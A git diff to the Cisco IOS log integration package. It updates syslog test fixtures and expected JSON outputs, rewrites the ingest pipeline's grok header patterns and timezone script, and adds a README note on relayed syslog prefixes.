a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log @@ -1,4 +1,6 @@ <190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: No MD5 digest from 192.168.0.1(64999) to 224.0.0.18(15448) (RST) tableid - 0 <190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: No MD5 digest from 192.168.0.1:64999 to 224.0.0.18:15448 (RST) tableid - 0 <190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: No MD5 digest from 192.168.0.1(64999) to 224.0.0.18(15448) -<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: No MD5 digest from 192.168.0.1:64999 to 224.0.0.18:15448 \ No newline at end of file +<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: No MD5 digest from 192.168.0.1:64999 to 224.0.0.18:15448 +<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234) +<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234) tableid - 3 diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log-expected.json index e8b2d0e9f7f..55e8969a95b 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-12-08T20:07:53.081Z", + "@timestamp": "2024-12-08T20:07:53.081Z", "cisco": { "ios": { "facility": "TCP", @@ -62,7 +62,7 @@ ] }, { - "@timestamp": "2023-12-08T20:07:53.081Z", + "@timestamp": "2024-12-08T20:07:53.081Z", "cisco": { "ios": { "facility": "TCP", @@ -123,7 +123,7 @@ ] }, { - "@timestamp": "2023-12-08T20:07:53.081Z", + "@timestamp": "2024-12-08T20:07:53.081Z", "cisco": { "ios": { "facility": "TCP", @@ -183,7 +183,7 @@ ] }, { - "@timestamp": "2023-12-08T20:07:53.081Z", + "@timestamp": "2024-12-08T20:07:53.081Z", "cisco": { "ios": { "facility": "TCP", @@ -241,6 +241,127 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2024-12-08T20:07:53.081Z", + "cisco": { + "ios": { + "facility": "TCP", + "message_count": 9004 + } + }, + "destination": { + "address": "10.0.0.2", + "ip": "10.0.0.2", + "port": 1234 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "code": "BADAUTH", + "original": "<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234)", + "provider": "firewall", + "sequence": 9004, + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "level": "informational", + "syslog": { + "priority": 190 + } + }, + "message": "Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234)", + "network": { + "type": "ipv4" + }, + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "10.0.0.1", + "10.0.0.2" + ] + }, + "source": { + "address": "10.0.0.1", + "ip": "10.0.0.1", + "port": 1234 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-12-08T20:07:53.081Z", + "cisco": { + "ios": { + "facility": "TCP", + "message_count": 9004, + "tableid": "3" + } + }, + "destination": { + "address": "10.0.0.2", + "ip": "10.0.0.2", + "port": 1234 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "code": "BADAUTH", + "original": "<190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234) tableid - 3", + "provider": "firewall", + "sequence": 9004, + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "level": "informational", + "syslog": { + "priority": 190 + } + }, + "message": "Invalid MD5 digest from 10.0.0.1(1234) to 10.0.0.2(1234) tableid - 3", + "network": { + "type": "ipv4" + }, + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "10.0.0.1", + "10.0.0.2" + ] + }, + "source": { + "address": "10.0.0.1", + "ip": "10.0.0.1", + "port": 1234 + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json index 132381ab74e..d238981b688 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-02-08T04:00:47.272Z", + "@timestamp": "2024-02-08T04:00:47.272Z", "cisco": { "ios": { "access_list": "177", @@ -63,7 +63,7 @@ ] }, { - "@timestamp": "2023-02-09T04:00:47.272Z", + "@timestamp": "2024-02-09T04:00:47.272Z", "cisco": { "ios": { "access_list": "INBOUND-ON-F11", @@ -128,7 +128,7 @@ ] }, { - "@timestamp": "2023-02-10T04:00:47.272Z", + "@timestamp": "2024-02-10T04:00:47.272Z", "cisco": { "ios": { "access_list": "171", @@ -189,7 +189,7 @@ ] }, { - "@timestamp": "2023-05-03T19:11:32.619Z", + "@timestamp": "2024-05-03T19:11:32.619Z", "cisco": { "ios": { "access_list": "ACL-IPv6-E0/0-IN/10", @@ -270,7 +270,7 @@ ] }, { - "@timestamp": "2023-06-20T02:41:39.326Z", + "@timestamp": "2024-06-20T02:41:39.326Z", "cisco": { "ios": { "access_list": "177", @@ -334,7 +334,7 @@ ] }, { - "@timestamp": "2023-06-20T02:41:44.921Z", + "@timestamp": "2024-06-20T02:41:44.921Z", "cisco": { "ios": { "access_list": "151", @@ -400,7 +400,7 @@ ] }, { - "@timestamp": "2023-06-20T02:42:27.342Z", + "@timestamp": "2024-06-20T02:42:27.342Z", "cisco": { "ios": { "access_list": "177", @@ -464,7 +464,7 @@ ] }, { - "@timestamp": "2023-06-20T02:42:28.374Z", + "@timestamp": "2024-06-20T02:42:28.374Z", "cisco": { "ios": { "facility": "SEC", @@ -502,7 +502,7 @@ ] }, { - "@timestamp": "2023-06-20T02:42:33.340Z", + "@timestamp": "2024-06-20T02:42:33.340Z", "cisco": { "ios": { "access_list": "177", @@ -566,7 +566,7 @@ ] }, { - "@timestamp": "2023-06-20T02:43:08.454Z", + "@timestamp": "2024-06-20T02:43:08.454Z", "cisco": { "ios": { "access_list": "150", @@ -642,7 +642,7 @@ ] }, { - "@timestamp": "2023-06-20T02:43:28.403Z", + "@timestamp": "2024-06-20T02:43:28.403Z", "cisco": { "ios": { "facility": "SEC", @@ -680,7 +680,7 @@ ] }, { - "@timestamp": "2023-06-20T02:43:28.403Z", + "@timestamp": "2024-06-20T02:43:28.403Z", "cisco": { "ios": { "access_list": "150", @@ -746,7 +746,7 @@ ] }, { - "@timestamp": "2023-06-20T02:43:29.451Z", + "@timestamp": "2024-06-20T02:43:29.451Z", "cisco": { "ios": { "access_list": "150", @@ -822,7 +822,7 @@ ] }, { - "@timestamp": "2023-03-24T18:06:03.424Z", + "@timestamp": "2024-03-24T18:06:03.424Z", "cisco": { "ios": { "action": "Login", @@ -882,7 +882,7 @@ ] }, { - "@timestamp": "2023-03-24T18:06:00.364Z", + "@timestamp": "2024-03-24T18:06:00.364Z", "cisco": { "ios": { "action": "exited", @@ -943,7 +943,7 @@ ] }, { - "@timestamp": "2023-03-24T17:37:39.000Z", + "@timestamp": "2024-03-24T17:37:39.000Z", "cisco": { "ios": { "action": "Join", @@ -1008,7 +1008,7 @@ ] }, { - "@timestamp": "2023-03-24T17:37:39.000Z", + "@timestamp": "2024-03-24T17:37:39.000Z", "cisco": { "ios": { "action": "Join", @@ -1076,7 +1076,7 @@ ] }, { - "@timestamp": "2023-03-24T12:09:35.367Z", + "@timestamp": "2024-03-24T12:09:35.367Z", "cisco": { "ios": { "facility": "OSPF", @@ -1114,7 +1114,7 @@ ] }, { - "@timestamp": "2023-03-24T12:06:47.099Z", + "@timestamp": "2024-03-24T12:06:47.099Z", "cisco": { "ios": { "facility": "CCH323", @@ -1152,7 +1152,7 @@ ] }, { - "@timestamp": "2023-07-11T09:34:00.020Z", + "@timestamp": "2024-07-11T09:34:00.020Z", "cisco": { "ios": { "access_list": "internet_in_gig0", @@ -1219,7 +1219,7 @@ ] }, { - "@timestamp": "2023-07-11T09:31:03.762Z", + "@timestamp": "2024-07-11T09:31:03.762Z", "cisco": { "ios": { "access_list": "110", @@ -1286,7 +1286,7 @@ ] }, { - "@timestamp": "2023-07-11T09:34:00.334Z", + "@timestamp": "2024-07-11T09:34:00.334Z", "cisco": { "ios": { "access_list": "internet_in_gig0", @@ -1353,7 +1353,7 @@ ] }, { - "@timestamp": "2023-07-11T09:34:00.209Z", + "@timestamp": "2024-07-11T09:34:00.209Z", "cisco": { "ios": { "access_list": "internet_in_gig0", @@ -1420,7 +1420,7 @@ ] }, { - "@timestamp": "2023-06-10T23:34:58.206Z", + "@timestamp": "2024-06-10T23:34:58.206Z", "cisco": { "ios": { "access_list": "ACL", @@ -1484,7 +1484,7 @@ ] }, { - "@timestamp": "2023-06-10T23:34:58.206Z", + "@timestamp": "2024-06-10T23:34:58.206Z", "cisco": { "ios": { "access_list": "ACL_TEST", @@ -1550,7 +1550,7 @@ ] }, { - "@timestamp": "2023-06-10T23:35:28.207Z", + "@timestamp": "2024-06-10T23:35:28.207Z", "cisco": { "ios": { "access_list": "ACL_TEST", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json index 502a3ba6e68..4e3977d0207 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json @@ -379,7 +379,7 @@ ] }, { - "@timestamp": "2023-01-06T22:11:43.398Z", + "@timestamp": "2024-01-06T22:11:43.398Z", "cisco": { "ios": { "facility": "FOO", @@ -421,7 +421,7 @@ ] }, { - "@timestamp": "2023-01-06T22:11:43.398Z", + "@timestamp": "2024-01-06T22:11:43.398Z", "cisco": { "ios": { "facility": "FOO", @@ -463,7 +463,7 @@ ] }, { - "@timestamp": "2023-01-06T22:11:43.000Z", + "@timestamp": "2024-01-06T22:11:43.000Z", "cisco": { "ios": { "facility": "FOO", @@ -505,7 +505,7 @@ ] }, { - "@timestamp": "2023-01-06T22:11:43.000Z", + "@timestamp": "2024-01-06T22:11:43.000Z", "cisco": { "ios": { "facility": "FOO", @@ -547,7 +547,7 @@ ] }, { - "@timestamp": "2023-01-16T22:11:43.398Z", + "@timestamp": "2024-01-16T22:11:43.398Z", "cisco": { "ios": { "facility": "FOO", @@ -589,7 +589,7 @@ ] }, { - "@timestamp": "2023-01-16T22:11:43.398Z", + "@timestamp": "2024-01-16T22:11:43.398Z", "cisco": { "ios": { "facility": "FOO", @@ -631,7 +631,7 @@ ] }, { - "@timestamp": "2023-01-16T22:11:43.000Z", + "@timestamp": "2024-01-16T22:11:43.000Z", "cisco": { "ios": { "facility": "FOO", @@ -673,7 +673,7 @@ ] }, { - "@timestamp": "2023-01-16T22:11:43.000Z", + "@timestamp": "2024-01-16T22:11:43.000Z", "cisco": { "ios": { "facility": "FOO", @@ -715,7 +715,7 @@ ] }, { - "@timestamp": "2023-01-16T22:11:43.000Z", + "@timestamp": "2024-01-16T22:11:43.000Z", "cisco": { "ios": { "facility": "FOO", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log index b8f69dd5332..9eefa5ac318 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log @@ -7,3 +7,6 @@ <191>2637087: rt401-rk30409: Aug 18 07:15:04.461 CEST: NTP Core (NOTICE): Clock is synchronized. <190>3352436: 3352457: Aug 12 2023 12:14:24.412 mdt: %IOSXE-6-PLATFORM: R0/0: cpp_cp: QFP:0.0 Thread:001 TS:00013807766185951588 %FW-6-SESS_AUDIT_TRAIL: (target:class) (ZP_PROCESS_TO_CORPORATE:CM_PROCESS_TO_CORPORATE):Stop dns session: initiator (10.50.14.44:33207) sent 48 bytes -- responder (10.120.42.6:53) sent 40 bytes, from GigabitEthernet10/0/2.6 <190>3352460: 3352481: Aug 12 2023 12:15:33.963 mdt: %IOSXE-6-PLATFORM: R0/0: cpp_cp: QFP:0.0 Thread:001 TS:00013807835737559120 %FW-6-DROP_PKT: Dropping tcp pkt from GigabitEthernet1/0/2.6 10.50.14.44:53836 => 89.160.20.128:80(target:class)-(ZP_PROCESS_TO_CORPORATE:class-default) due to Policy drop:classify result with ip ident 13017 tcp flag 0x2, seq 4266642156, ack 0 +<191>: rt401-rk30409: Aug 18 07:15:04.461 CEST: last message repeated 66 times +<189>1469087: chswitchm1: Mar 29 07:40:10.863 CDT: %ILPOWER-5-SENSE_POWER_INVALID: Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV +<189>1469087: ch_switch_m-1: Mar 29 07:40:10.863 CDT: %ILPOWER-5-SENSE_POWER_INVALID: Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV \ No newline at end of file diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json index ab72ab56076..6b2cb0278b9 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json @@ -188,7 +188,7 @@ ] }, { - "@timestamp": "2023-08-18T07:15:04.461Z", + "@timestamp": "2024-08-18T07:15:04.461Z", "cisco": { "ios": { "message_count": 2637085 @@ -226,7 +226,7 @@ ] }, { - "@timestamp": "2023-08-18T07:15:04.461Z", + "@timestamp": "2024-08-18T07:15:04.461Z", "cisco": { "ios": { "message_count": 2637086 @@ -264,7 +264,7 @@ ] }, { - "@timestamp": "2023-08-18T07:15:04.461Z", + "@timestamp": "2024-08-18T07:15:04.461Z", "cisco": { "ios": { "message_count": 2637087 @@ -445,6 +445,122 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2024-08-18T07:15:04.461Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "original": "<191>: rt401-rk30409: Aug 18 07:15:04.461 CEST: last message repeated 66 times", + "provider": "firewall", + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "syslog": { + "hostname": "rt401-rk30409", + "priority": 191 + } + }, + "message": "last message repeated 66 times", + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-03-29T07:40:10.863Z", + "cisco": { + "ios": { + "facility": "ILPOWER", + "message_count": 1469087 + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "code": "SENSE_POWER_INVALID", + "original": "<189>1469087: chswitchm1: Mar 29 07:40:10.863 CDT: %ILPOWER-5-SENSE_POWER_INVALID: Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV", + "provider": "firewall", + "sequence": 1469087, + "severity": 5, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "level": "notification", + "syslog": { + "hostname": "chswitchm1", + "priority": 189 + } + }, + "message": "Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV", + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-03-29T07:40:10.863Z", + "cisco": { + "ios": { + "facility": "ILPOWER", + "message_count": 1469087 + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "code": "SENSE_POWER_INVALID", + "original": "<189>1469087: ch_switch_m-1: Mar 29 07:40:10.863 CDT: %ILPOWER-5-SENSE_POWER_INVALID: Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV", + "provider": "firewall", + "sequence": 1469087, + "severity": 5, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "level": "notification", + "syslog": { + "hostname": "ch_switch_m-1", + "priority": 189 + } + }, + "message": "Interface Gi1/0/25: invalid power sense 78054 milliwatts current 515 mA voltage 151562 mV", + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log new file mode 100644 index 00000000000..8d98f6177dc --- /dev/null +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log @@ -0,0 +1 @@ +<190>2361044: sw01: Jan 16 2022 22:11:43: %FOO-6-BAR: Test date format. diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-config.yml b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-config.yml new file mode 100644 index 00000000000..ff85b2f2967 --- /dev/null +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-config.yml @@ -0,0 +1,7 @@ +dynamic_fields: + "event.ingested": ".*" +fields: + tags: + - preserve_original_event + _conf: + tz_offset: "-0600" diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-expected.json new file mode 100644 index 00000000000..c3da29e0772 --- /dev/null +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-tzoffset.log-expected.json @@ -0,0 +1,46 @@ +{ + "expected": [ + { + "@timestamp": "2022-01-16T22:11:43.000-06:00", + "cisco": { + "ios": { + "facility": "FOO", + "message_count": 2361044 + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "code": "BAR", + "original": "<190>2361044: sw01: Jan 16 2022 22:11:43: %FOO-6-BAR: Test date format.", + "provider": "firewall", + "sequence": 2361044, + "severity": 6, + "timezone": "-0600", + "type": [ + "info" + ] + }, + "log": { + "level": "informational", + "syslog": { + "hostname": "sw01", + "priority": 190 + } + }, + "message": "Test date format.", + "observer": { + "product": "IOS", + "type": "firewall", + "vendor": "Cisco" + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/cisco_ios/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/cisco_ios/data_stream/log/_dev/test/system/test-logfile-config.yml index 0410c743b93..a4f39e1a544 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/system/test-logfile-config.yml +++ b/packages/cisco_ios/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -10,3 +10,5 @@ data_stream: tz_long: Australia/Sydney - tz_short: ACDT tz_long: Australia/Adelaide +assert: + hit_count: 35 diff --git a/packages/cisco_ios/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/cisco_ios/data_stream/log/_dev/test/system/test-tcp-config.yml index ba2e404a18c..a1a8b4bcb48 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/cisco_ios/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -7,3 +7,5 @@ data_stream: syslog_port: 9514 preserve_original_event: true tz_offset: '-05:00' +assert: + hit_count: 35 diff --git a/packages/cisco_ios/data_stream/log/_dev/test/system/test-tls-config.yml b/packages/cisco_ios/data_stream/log/_dev/test/system/test-tls-config.yml index d7e572cbede..6ff2ddb6d8a 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/system/test-tls-config.yml +++ b/packages/cisco_ios/data_stream/log/_dev/test/system/test-tls-config.yml @@ -58,3 +58,5 @@ data_stream: X3HJFiimZVaNjXATqmC/y2A1KXvJdamPLy3mGXkW2cFLoPCdK2OZFUHqiuc1bigA qEf55SihFqErRMeURPPF -----END CERTIFICATE----- +assert: + hit_count: 35 diff --git a/packages/cisco_ios/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/cisco_ios/data_stream/log/_dev/test/system/test-udp-config.yml index 3bb21fd9b82..0f5d449853e 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/system/test-udp-config.yml +++ b/packages/cisco_ios/data_stream/log/_dev/test/system/test-udp-config.yml @@ -12,3 +12,5 @@ data_stream: tz_long: Australia/Sydney - tz_short: ACDT tz_long: Australia/Adelaide +assert: + hit_count: 35 diff --git a/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 52c6adad86f..c1c14312834 100644 --- a/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -33,36 +33,23 @@ processors: ignore_missing: true - grok: field: event.original - patterns: - - '%{DATA:_temp_.header} %%{GREEDYDATA:message}' - - '%{DATA:_temp_.header} %{NTP_MESSAGE:ntp_message}' - pattern_definitions: - NTP_MESSAGE: 'NTP %{GREEDYDATA}' - tag: dissect_header - - grok: - field: _temp_.header tag: grok_header patterns: - - '^(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?(%{HOSTNAME:log.syslog.hostname}[:]? )?%{NUMBER:cisco.ios.sequence}: (%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?(%{HOSTNAME:log.syslog.hostname}: )?%{NUMBER:cisco.ios.sequence}: (%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?(%{HOSTNAME:log.syslog.hostname}: )?(%{NUMBER:cisco.ios.sequence}: )?(%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )?(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?%{HOSTNAME:log.syslog.hostname}: %{NUMBER:cisco.ios.sequence}: (%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )?(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?%{NUMBER:cisco.ios.sequence}: (%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )?(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?%{HOSTNAME:log.syslog.hostname}: (%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' - - '^(<%{NONNEGINT:log.syslog.priority:long}>)?(?:%{NUMBER:cisco.ios.message_count}: |: )?(%{SYSLOGTIMESTAMP}[:]? )?(%{IP}[:]? )?(%{HOSTNAME:log.syslog.hostname}: )?(%{NUMBER:cisco.ios.sequence}: )?(%{CISCO_TIMESTAMP}|%{NOTSPACE:cisco.ios.uptime}:)' + - '^%{CISCO_PRIORITY_MSGCOUNT}?%{SYSLOGTIMESTAMP} %{IP} %{CISCO_HOSTNAME:log.syslog.hostname}: (?:%{NUMBER:cisco.ios.sequence}: )?(?:%{CISCO_UPTIME:cisco.ios.uptime}|%{CISCO_TIMESTAMP}): %{GREEDYDATA:_temp_.message}$' + - '^%{CISCO_PRIORITY_MSGCOUNT}?%{SYSLOGTIMESTAMP} (?:%{IP}|%{CISCO_HOSTNAME:log.syslog.hostname}) %{NUMBER:cisco.ios.sequence}: (?:%{CISCO_UPTIME:cisco.ios.uptime}|%{CISCO_TIMESTAMP}): %{GREEDYDATA:_temp_.message}$' + - '^%{CISCO_PRIORITY_MSGCOUNT}?(?:(?:%{CISCO_HOSTNAME:log.syslog.hostname}|%{IP})[:]? )?(?:%{NUMBER:cisco.ios.sequence}: )?(?:%{CISCO_UPTIME:cisco.ios.uptime}|%{CISCO_TIMESTAMP}): %{GREEDYDATA:_temp_.message}$' pattern_definitions: + CISCO_PRIORITY_MSGCOUNT: '<%{NONNEGINT:log.syslog.priority:long}>(?:%{NONNEGINT:cisco.ios.message_count})?(?:: )?' CISCO_TIMESTAMP: '[*]?%{CISCOTIMESTAMP:_temp_.cisco_timestamp}(?: %{CISCO_TZ:_temp_.tz})?' + CISCO_UPTIME: '[0-9a-zA-Z]+' + CISCO_HOSTNAME: '[a-zA-Z][0-9a-zA-Z_-]{0,61}[0-9a-zA-Z]?' CISCO_TZ: '[a-zA-Z]{1,4}' - on_failure: - - append: - field: error.message - value: |- - Processor "{{ _ingest.on_failure_processor_type }}" with tag "{{ _ingest.on_failure_processor_tag }}" in pipeline "{{ _ingest.on_failure_pipeline }}" failed with message "{{ _ingest.on_failure_message }}" - - remove: - field: _temp_.header - ignore_missing: true - tag: on_failure_remove_header - + - grok: + field: _temp_.message + tag: grok_message + patterns: + - '^%%{GREEDYDATA:message}$' + - '^%{GREEDYDATA:_temp_.generic_message}$' - set: field: event.sequence copy_from: cisco.ios.sequence @@ -83,41 +70,30 @@ processors: ignore_missing: true pattern: ' {2,}' replacement: ' ' - # Adding support to map timezone abbreviations that is not supported by Java manually. - # If no match is found, it will default back to _conf.tz_offset as before. - # If tz_offset is not set, it will default to UTC as before. - script: lang: painless tag: script_timezone - if: ctx._temp_?.tz != null && ctx._temp_?.tz != '' - source: >- - def conf = ctx['_conf']; - if (conf == null) return; - - if (conf.tz_offset == null) { - conf.tz_offset = 'UTC'; - } - - def mappings = conf.tz_map; - if (mappings == null) { - ctx.event.timezone = conf.tz_offset; - return; - } - - def tz_log = ctx._temp_.tz; - for (def item : mappings) { - if (item.tz_short == tz_log) { - ctx.event.timezone = item.tz_long; - break; + description: >- + Add support to map timezone abbreviations that are not supported by + Java manually. If no match is found, it will default back to + _conf.tz_offset as before. If tz_offset is not set, it will default to + UTC as before. + if: + source: |- + if (ctx._temp_?.tz != null && ctx._conf?.tz_map != null) { + for (def item : ctx._conf.tz_map) { + if (item.tz_short == ctx._temp_.tz) { + ctx.event.timezone = item.tz_long; + return; + } } } - if (ctx.event.timezone == null) { - ctx.event.timezone = conf.tz_offset; + if (ctx._conf?.tz_offset != null) { + ctx.event.timezone = ctx._conf.tz_offset; + } + if (ctx.event?.timezone == null) { + ctx.event.timezone = 'UTC'; } - - set: - field: event.timezone - value: UTC - if: ctx.event?.timezone == null - date: if: ctx?._temp_.cisco_timestamp != null field: _temp_.cisco_timestamp @@ -162,10 +138,10 @@ processors: ignore_missing: true if: ctx.cisco?.ios?.facility == 'FW' && ctx.event?.code == 'DROP_PKT' - rename: - field: ntp_message + field: _temp_.generic_message target_field: message - tag: rename_ntp_message - if: ctx.ntp_message != null + tag: rename_generic_message + if: ctx._temp_?.generic_message != null - convert: field: event.severity type: long @@ -215,7 +191,7 @@ processors: field: message tag: grok_badauth patterns: - - '^No MD5 digest from %{DATA:source.address}(\(%{INT:source.port}\)|\:%{INT:source.port}) to %{DATA:destination.address}(\(%{INT:destination.port}\)|\:%{INT:destination.port})(?: \(RST\) ((tableid - %{DATA:cisco.ios.tableid})|(%{GREEDYDATA:_temp_.rst})))?$' + - '^(?:No|Invalid) MD5 digest from %{DATA:source.address}(\(%{INT:source.port}\)|\:%{INT:source.port}) to %{DATA:destination.address}(\(%{INT:destination.port}\)|\:%{INT:destination.port})(?:(?: \(RST\))? (?:tableid - %{DATA:cisco.ios.tableid}|%{GREEDYDATA:_temp_.rst}))?$' ignore_missing: true if: ctx.event?.code == 'BADAUTH' - grok: diff --git a/packages/cisco_ios/docs/README.md b/packages/cisco_ios/docs/README.md index 29aac1cc702..40e9a7a6b32 100644 --- a/packages/cisco_ios/docs/README.md +++ b/packages/cisco_ios/docs/README.md @@ -15,6 +15,7 @@ The format of timezones added to Cisco IOS logs does not always match the expect 2. `Timezone Map` - This option is for users who have logs from multiple timezones and want to translate them to the correct timezone. This option allows the user to specify a map of timezones to translate from and to. This option is recommended for advanced users who have logs from multiple timezones being sent to the same integration instance. If the timezone in a Cisco IOS log entry does not match any of the configured mappings, the log will fall back to the timezone specified in the `Timezone` option, and also defaults to `UTC`. +If log messages are relayed resulting in additional syslog header prefixes or other text, this text must be removed for ingestion to be successful. This may be done by adding an appropriate Beats processor to the configuration. ### IOS diff --git a/packages/cisco_ios/manifest.yml b/packages/cisco_ios/manifest.yml index 9d211e82a02..49379e44dce 100644 --- a/packages/cisco_ios/manifest.yml +++ b/packages/cisco_ios/manifest.yml @@ -1,7 +1,7 @@ 